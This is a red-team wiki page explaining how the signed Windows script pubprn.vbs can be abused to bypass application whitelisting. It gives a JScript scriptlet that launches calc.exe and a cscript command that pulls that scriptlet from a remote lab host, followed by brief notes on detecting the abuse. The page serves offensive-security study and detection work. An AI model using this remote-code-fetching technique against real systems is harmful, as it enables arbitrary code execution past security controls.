Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
regsvr32
MSHTA
Control Panel Item
Executing Code as a Control Panel Item through an Exported Cplapplet Function
Code Execution through Control Panel Add-ins
CMSTP
InstallUtil
Using MSBuild to Execute Shellcode in C#
Forfiles Indirect Command Execution
Application Whitelisting Bypass with WMIC and XSL
Powershell Without Powershell.exe
Powershell Constrained Language Mode ByPass
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
pubprn.vbs Signed Script Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By
GitBook
pubprn.vbs Signed Script Code Execution
Signed Script Proxy Execution - bypass application whitelisting using pubprn.vbs
Execution
Using pubprn.vbs, we will execute code to launch calc.exe. First of, the xml that will be executed by the script:
http://192.168.2.71/tools/mitre/proxy-script/proxy.sct
1
<?XML version="1.0"?>
2
<
scriptlet
>
3
​
4
<
registration
5
description
=
"Bandit"
6
progid
=
"Bandit"
7
version
=
"1.00"
8
classid
=
"{AAAA1111-0000-0000-0000-0000FEEDACDC}"
9
>
10
</
registration
>
11
​
12
<
script language
=
"JScript"
>
13
<![CDATA[
14
var
r
=
new
ActiveXObject
(
"WScript.Shell"
).
Run
(
"calc.exe"
);
15
]]>
16
</
script
>
17
​
18
</
scriptlet
>
Copied!
[email protected]
1
cscript
/
b
C
:
\Windows\System32\Printing_Admin_Scripts\en
-
US\pubprn
.
vbs
127.0.0.1
script
:
http
:
//
192.168.2.71
/
tools
/
mitre
/
proxy
-
script
/
proxy
.
sct
Copied!
Observations
Calc.exe gets spawned by cscript.exe which immediately closes leaving the calc.exe process orphan:
Monitoring commandlines can be useful in detecting the script being abused:
References
Signed Script Proxy Execution, Technique T1216 - Enterprise | MITRE ATT&CK®
Previous
Forcing Iexplore.exe to Load a Malicious DLL via COM Abuse
Next - offensive security
Code & Process Injection
Last modified
3yr ago
Copy link
Contents
Execution
Observations
References